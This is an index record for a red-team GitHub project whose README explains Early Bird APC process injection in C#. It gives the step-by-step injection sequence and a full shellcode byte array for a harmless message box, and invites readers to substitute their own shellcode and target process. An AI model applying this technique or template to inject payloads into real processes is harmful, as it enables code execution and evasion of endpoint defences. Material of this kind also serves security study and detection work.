{"id":19369431,"url":"https://github.com/kara-4search/earlybirdinjection_csharp","last_synced_at":"2025-07-17T07:36:31.215Z","repository":{"id":136106629,"uuid":"401338981","full_name":"Kara-4search/EarlyBirdInjection_CSharp","owner":"Kara-4search","description":"Inject shellcode into process via \"EarlyBird\"","archived":false,"fork":false,"pushed_at":"2021-08-30T13:35:15.000Z","size":27,"stargazers_count":26,"open_issues_count":0,"forks_count":8,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-04-23T15:46:57.403Z","etag":null,"topics":["apc","bypass","csharp","earlybird","edr","injection","process-injection","redteam","shellcode"],"latest_commit_sha":null,"homepage":"","language":"C#","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Kara-4search.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2021-08-30T12:39:49.000Z","updated_at":"2025-03-13T21:00:45.000Z","dependencies_parsed_at":null,"dependency_job_id":"77b8fc45-2dd6-4e25-ad27-68c64e75dddb","html_url":"https://github.com/Kara-4search/EarlyBirdInjection_CSharp","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/Kara-4search/EarlyBirdInjection_CSharp","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Kara-4search%2FEarlyBirdInjection_CSharp","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Kara-4search%2FEarlyBirdInjection_CSharp/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Kara-4search%2FEarlyBirdInjection_CSharp/re
leases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Kara-4search%2FEarlyBirdInjection_CSharp/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Kara-4search","download_url":"https://codeload.github.com/Kara-4search/EarlyBirdInjection_CSharp/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Kara-4search%2FEarlyBirdInjection_CSharp/sbom","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":265578037,"owners_count":23791277,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["apc","bypass","csharp","earlybird","edr","injection","process-injection","redteam","shellcode"],"created_at":"2024-11-10T08:11:16.374Z","updated_at":"2025-07-17T07:36:31.194Z","avatar_url":"https://github.com/Kara-4search.png","language":"C#","funding_links":[],"categories":[],"sub_categories":[],"readme":"# EarlyBirdInjection_CSharp\n\nBlog link: working on it\n\n- EarlyBirdInjection, process injection technique.\n- Only tested on win10/x64, works fine.\n- Some simplified context around threads and APC queues:\n\t1. Threads execute code within processes\n\t2. Threads can execute code asynchronously by leveraging APC queues\n\t3. Each thread has a queue that stores all the APCs\n\t4. Application can queue an APC to a given thread (subject to privileges)\n\t5. **When a thread is scheduled, queued APCs get executed.**\n\t6. 
A disadvantage of this technique is that the malicious program cannot force the victim thread to execute the injected code: the thread to which the APC was queued needs to enter (or already be in) an alertable state (e.g. via SleepEx), but you may want to check out Shellcode Execution in a Local Process with QueueUserAPC and NtTestAlert.\n\t\n- Steps\n\t1. Find the process id.\n\t2. Open the process.\n\t3. Allocate memory in the target process's address space.\n\t4. Write the shellcode into that memory.\n\t5. Create a thread in a suspended state.\n\t6. Queue an APC to that thread.\n\t7. ResumeThread.\n\t\n- The shellcode below is a MessageBox payload\n```csharp\n            /*   Messagebox shellcode   */\n            byte[] buf1 = new byte[323] {\n            0xfc,0x48,0x81,0xe4,0xf0,0xff,0xff,0xff,0xe8,0xd0,0x00,0x00,0x00,0x41,0x51,\n            0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x3e,0x48,\n            0x8b,0x52,0x18,0x3e,0x48,0x8b,0x52,0x20,0x3e,0x48,0x8b,0x72,0x50,0x3e,0x48,\n            0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,\n            0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x3e,\n            0x48,0x8b,0x52,0x20,0x3e,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x3e,0x8b,0x80,0x88,\n            0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x6f,0x48,0x01,0xd0,0x50,0x3e,0x8b,0x48,\n            0x18,0x3e,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x5c,0x48,0xff,0xc9,0x3e,\n            0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,\n            0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x3e,0x4c,0x03,0x4c,0x24,\n            0x08,0x45,0x39,0xd1,0x75,0xd6,0x58,0x3e,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,\n            0x66,0x3e,0x41,0x8b,0x0c,0x48,0x3e,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x3e,\n            0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,\n            0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,\n            
0x59,0x5a,0x3e,0x48,0x8b,0x12,0xe9,0x49,0xff,0xff,0xff,0x5d,0x49,0xc7,0xc1,\n            0x00,0x00,0x00,0x00,0x3e,0x48,0x8d,0x95,0x1a,0x01,0x00,0x00,0x3e,0x4c,0x8d,\n            0x85,0x2b,0x01,0x00,0x00,0x48,0x31,0xc9,0x41,0xba,0x45,0x83,0x56,0x07,0xff,\n            0xd5,0xbb,0xe0,0x1d,0x2a,0x0a,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x48,\n            0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,\n            0x72,0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x48,0x65,0x6c,0x6c,0x6f,\n            0x2c,0x20,0x66,0x72,0x6f,0x6d,0x20,0x4d,0x53,0x46,0x21,0x00,0x4d,0x65,0x73,\n            0x73,0x61,0x67,0x65,0x42,0x6f,0x78,0x00 };\n\t\t\t\n```\n\n## Usage\n1. Replace the shellcode with your own.\n\t![avatar](https://raw.githubusercontent.com/Kara-4search/ProjectPics/main/EarlyBirdInject_shellcode.png)\n2. Set the name of the process you want to inject into.\n\t* The default name in the project is PowerShell.\n\t![avatar](https://raw.githubusercontent.com/Kara-4search/ProjectPics/main/EarlyBirdInject_processname.png)\n3. The message box shows up.\n\t![avatar](https://raw.githubusercontent.com/Kara-4search/ProjectPics/main/EarlyBirdInject_messagebox.png)\n\t\n\t\n## TO-DO list\n- NONE\n\n## Update history\n- NONE\n\n## Reference links\n\t1. http://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FAPC%2FNtQueueApcThread.html\n\t2. https://idiotc4t.com/code-and-dll-process-injection/apc-and-nttestalert-code-execute\n\t3. https://idiotc4t.com/code-and-dll-process-injection/apc-injection\n\t4. https://idiotc4t.com/code-and-dll-process-injection/apc-thread-hijack\n\t5. https://www.ired.team/offensive-security/code-injection-process-injection/shellcode-execution-in-a-local-process-with-queueuserapc-and-nttestalert\n\t6. https://www.ired.team/offensive-security/code-injection-process-injection/early-bird-apc-queue-code-injection\n\t7. 
https://www.ired.team/offensive-security/code-injection-process-injection/apc-queue-code-injection\n\t8. https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createremotethread\n\t9. http://pinvoke.net/default.aspx/kernel32/CreateRemoteThread.html\n\t10. https://docs.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualallocex\n\t11. https://malcomvetter.medium.com/net-process-injection-1a1af00359bc\n\t12. https://github.com/pwndizzle/c-sharp-memory-injection/blob/master/apc-injection-new-process.cs\n\t13. https://introspelliam.github.io/2017/06/22/tools/关于metasploit的EXITFUNC参数的解释/\n\t14. http://garage4hackers.com/showthread.php?t=1820\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fkara-4search%2Fearlybirdinjection_csharp","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fkara-4search%2Fearlybirdinjection_csharp","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fkara-4search%2Fearlybirdinjection_csharp/lists"}